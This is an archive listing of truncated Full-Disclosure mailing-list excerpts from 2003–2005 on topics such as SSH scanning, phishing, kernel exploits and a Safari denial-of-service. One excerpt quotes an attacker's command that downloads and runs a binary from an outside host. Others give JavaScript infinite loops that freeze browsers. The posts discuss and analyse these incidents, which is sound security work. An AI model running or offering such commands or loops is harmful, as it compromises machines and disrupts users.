Re: [Full-Disclosure] Bios programming...

2005-03-03 Thread Christian Leber
a insufficient troll[1] or someone who has no idea of nothing. Oh, or you are working for the Bush administration. Regards Christian Leber [1] If that is true, I'm sorry that i gave food to it. -- http://www.nosoftwarepatents.com ___ Full-Disclosure - We

Re: [Full-Disclosure] this is fun?

2005-02-20 Thread Christian
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Brandy Simon wrote: http://picserv.on.zoy.org/IM39571.jpg hm, what exactly is it? $ wget http://picserv.on.zoy.org/IM39571.jpg - --14:45:06-- http://picserv.on.zoy.org/IM39571.jpg = `IM39571.jpg' Resolving picserv.on.zoy.org...

Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected

2005-01-09 Thread Christian
: In function `scan_mm_start': elflbl_v108.c:425: error: storage size of `l' isn't known elflbl_v108.c:425: error: storage size of `l' isn't known elflbl_v108.c: In function `check_vma_flags': elflbl_v108.c:545: warning: deprecated use of label at end of compound statement Christian. - -- BOFH excuse

Re: [Full-Disclosure] security hole in german Telekom T-Sinus 111

2004-11-22 Thread Christian Fromme
the connection could always beeing disconntected. Very interesting! Please keep us updated on this topic. -- Christian Fromme EMail: derfromme at gmx.de PGP-Pubkey: http://www.informatik.fh-wiesbaden.de/~cfrom001/pgp/index.html ___ Full-Disclosure - We

Re: [Full-Disclosure] Why is IRC still around?

2004-11-20 Thread Christian Fromme
to protect yourself? /irony Best wishes, Christian -- Christian Fromme EMail: derfromme at gmx.de PGP-Pubkey: http://www.informatik.fh-wiesbaden.de/~cfrom001/pgp/index.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full

Re: [Full-Disclosure] question regarding CAN-2004-0930

2004-11-17 Thread Christian
(wildcards) so it doesn't even arrive at the smb server. ah, now that makes sense, yes. thanks for the explanation. Christian. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] question regarding CAN-2004-0930

2004-11-16 Thread Christian
, Christian. -- BOFH excuse #170: popper unable to process jumbo kernel ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] interesting trojan found

2004-10-21 Thread Christian . Loretan
, which... _ Hi Look at http://www.sysinternals.com/ntw2k/freeware/ntfsdospro.shtml It is a very helpfull tool to access NTFS Partitions. Sincerely Christian Loretan Swisstopo _

Re: [Full-Disclosure] unarj dir-transversal bug (../../../..)

2004-10-12 Thread Christian Kujau
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Chris Umphress wrote: ...somehow i don't expect programs to mess with /usr. not as a user and not as root. I just picked /usr, it could have been /etc, /var or any other standard directory that every *nix distribution has. Regardless, if I try to

Re: [Full-Disclosure] WWII cryptography: the dark side

2004-10-10 Thread Christian Leber
/18371/1.html Christian Leber -- Omnis enim res, quae dando non deficit, dum habetur et non datur, nondum habetur, quomodo habenda est. (Aurelius Augustinus) Translation: http://gnuhh.org/work/fsf-europe/augustinus.html ___ Full

Re: [Full-Disclosure] Viral infection via Serial Cable

2004-08-30 Thread Christian
data just sent to com1? thanks, Christian. -- BOFH excuse #310: asynchronous inode failure ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Viral infection via Serial Cable

2004-08-30 Thread Christian
. or is all data just sent to com1? thanks, Christian. -- BOFH excuse #416: We're out of slots on the server ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: Betr.: RE: [Full-Disclosure] Automated ssh scanning

2004-08-27 Thread Christian
Andrew Farmer wrote: If you take a look at this bit: wget www.bo2k-rulez.net/a chmod +x a ./a [...] Whatever it is, it doesn't work under 2.6.7: peon % ./a (long pause) [-] Unable to determine kernel address: Operation not supported zsh: segmentation fault ./a peon % $ clamscan a

Re: [Full-Disclosure] Automated SSH login attempts?

2004-07-30 Thread Christian Fromme
to bruteforce some accounts like admin test and so on with passwords like test 1234 and i dont know what. Seems to be not too serious because noone actually has those account in real life. ;) Best wishes, Christian -- Christian Fromme chris at kaner.shacknet.nu PGP-Pubkey: http

Re: [Full-Disclosure] weather.com contact

2004-06-05 Thread Christian Horchert
looking out of my office window today, I must admit, that I am really looking forward to see that one ;-) Christian ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] New security ezine released

2004-05-26 Thread Christian Ney
Hi Nico, hi list! From the file 'nc0-0x06.txt' : === [...] === Hoax ? There's only one way to find out: compile this stuff and use strings BINARY|tail -2 on the

Re: [Full-Disclosure] Exploit different

2004-05-22 Thread Christian Horchert
Rosa! Am 22.05.2004 um 13:42 schrieb Rosalina Hamar: Mount a FTP/DAV/SMB/AFS-Volume You probably mean AFP (Apple Filing Protocol) 2) Telnet URI Handler File Creation/Truncation Vulnerability Discovered by iDefense: http://securityfocus.com/bid/10341 (I already told you ;) Take care, Christian

Re: [Full-Disclosure] iDEFENSE Security Advisory 05.12.04: Opera Telnet URI Handler File Creation/Truncation Vulnerability

2004-05-16 Thread Christian Horchert
, iCab, and TrailBlazer, too. I also recognized, that Firefox supports telnet URIs as img and script source (beside meta-tags, iframe etc.). Christian ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] Support the Sasser-author fund started

2004-05-15 Thread Christian Fromme
Sim Brown [EMAIL PROTECTED] wrote: You're a nazi... A patriot would respect other countries and their laws... I hereby invoke Godwin's Law and declare this thread dead. Harhar, this is not going to work i bet...anyway a wise idea. Best wishes, Christian -- Christian Fromme chris

Re: [Full-Disclosure] morning_wood is really a blackhat

2004-05-04 Thread Christian Fromme
reiterations of the same lame questions. Censorship is not what we're looking for. Best wishes, Chris -- Christian Fromme derfromme at gmx dot de PGP-Pubkey: http://www.informatik.fh-wiesbaden.de/~cfrom001/pgp/index.html ___ Full-Disclosure - We

Re: [Full-Disclosure] morning_wood is really a blackhat

2004-05-04 Thread Christian Fromme
madsaxon [EMAIL PROTECTED] wrote: At 04:37 PM 5/4/2004 +0200, Christian Fromme wrote: Censorship is not what we're looking for. I think that's a debatable issue. It seems to me that some people on this list confuse full disclosure of exploit-related code and advisories with unfettered

Re: [Full-Disclosure] morning_wood is really a blackhat

2004-05-04 Thread Christian Fromme
a little bit off-topic and we dont wont to annoy anyone. ;) Best wishes, Christian -- Christian Fromme chris at linux.fanatism.us PGP-Pubkey: http://www.informatik.fh-wiesbaden.de/~cfrom001/pgp/index.html ___ Full-Disclosure - We believe in it. Charter

Re: [Full-Disclosure] Another false Citibank e-mail...a new phishing?

2004-03-20 Thread Christian
of www.sk.com (from FAQ: What is SK? SK is Koreas fourth largest conglomerate and one of the leading business organizations in Asia...) someone has set up a 2nd Apache on :443 (!SSL), and created /citi to phish credit card numbers?? Christian. -- BOFH excuse #376: Budget cuts forced us to sell

RE: [Full-Disclosure] What's wrong with this picture?

2004-03-01 Thread Christian Kastner
http://news.bbc.co.uk/1/hi/technology/3485972.stm From the url above: We have never had vulnerabilities exploited before the patch was known, he said. Right. Did nobody ask this fella why they issue patches at all then? Without patches, his statement would look like this: We have

Re: [Full-Disclosure] file inclusion (les visiteurs)

2003-12-02 Thread Christian Horchert
. Guess we talk at cross purposes ... Christian ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] file inclusion (les visiteurs)

2003-12-01 Thread Christian Horchert
to Zone H: http://www.zone-h.org/en/defacements/filter/filter_defacer=Xfree+Team/ Take care, Christian ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] file inclusion (les visiteurs)

2003-12-01 Thread Christian Horchert
by making it public to guerradigital, delta5 and zone-h isn't exactly what I would call intending to advice people, sorry. But maybe I'm wrong ... Christian ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure

Re: [Full-Disclosure] safari dos

2003-11-22 Thread Christian Horchert
on this page is causing KHTML to freeze. If it continues to run, other applications may become less responsive At least it catches the error. Christian ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] safari dos

2003-11-22 Thread Christian Horchert
Am 22.11.2003 um 01:58 schrieb [EMAIL PROTECTED]: A very simple javascript block like this one: while (true) { document.location sherlock://com.apple.movies? } or just shorter while(1){} Christian ___ Full-Disclosure - We believe in it. Charter

Re: [Full-Disclosure] safari dos

2003-11-22 Thread Christian Horchert
change :) probably even just sherlock:// works and probably some other loops are vulnerable, but it's the same kind and how is about while(1){document.write('yes')? bugs camino, mozilla and explorer, at least on osx ;P i like the different behaviours of each. Christian

[Full-Disclosure] Infinite JavaScript Loop

2003-11-22 Thread Christian Horchert
= 0; while (1) { i++; document.write('p'+ i + ': yes/p'); } /script [1] http://www.insecure.ws/article.php?story=20031122012748282 Christian ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] safari dos

2003-11-21 Thread Christian Horchert
and is not vulnerable. I don't know about other browers on MacOSX, but they are probably not vulnerable. (OmniWeb?) BBEdit ate cpu while previewing. Mhhh... aren't there quite a couple of programmes utelizing the foundation :-\ Christian ___ Full-Disclosure - We

Re: [Full-Disclosure] My new PGP key

2003-10-25 Thread Christian Horchert
in advance, Christian -- If you don't love it, leave it (Merle Haggard) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

[Full-Disclosure] Betr:Full-Disclosure digest, Vol 1 #993 - 32 msgs

2003-08-01 Thread Christian Poersch
Form: Reply Text: (22 lines follow) I´m on vacation from 01.08.03 up to 01.09.03. In cases of CAP2, VPN or Corporate products please contact Thomas Levy, -2004 -- Vodafone D2 GmbH Abteilung TOAR Christian Poersch Am Seestern 1 40547 Düsseldorf Tel. +49 (0

Re(2): [Full-Disclosure] Windows Messenger Popup Spam on UDP Port 1026

2003-06-23 Thread Christian Friedl
[EMAIL PROTECTED] writes on Mon, 23 Jun 2003 11:16:38 +0200 (METDST): I agree. However, that is not a serious option anymore. Fact is: Every dummy and his grandma are using the Internet today. You won't be able to change the fact, so we will all have to find ways to minimize the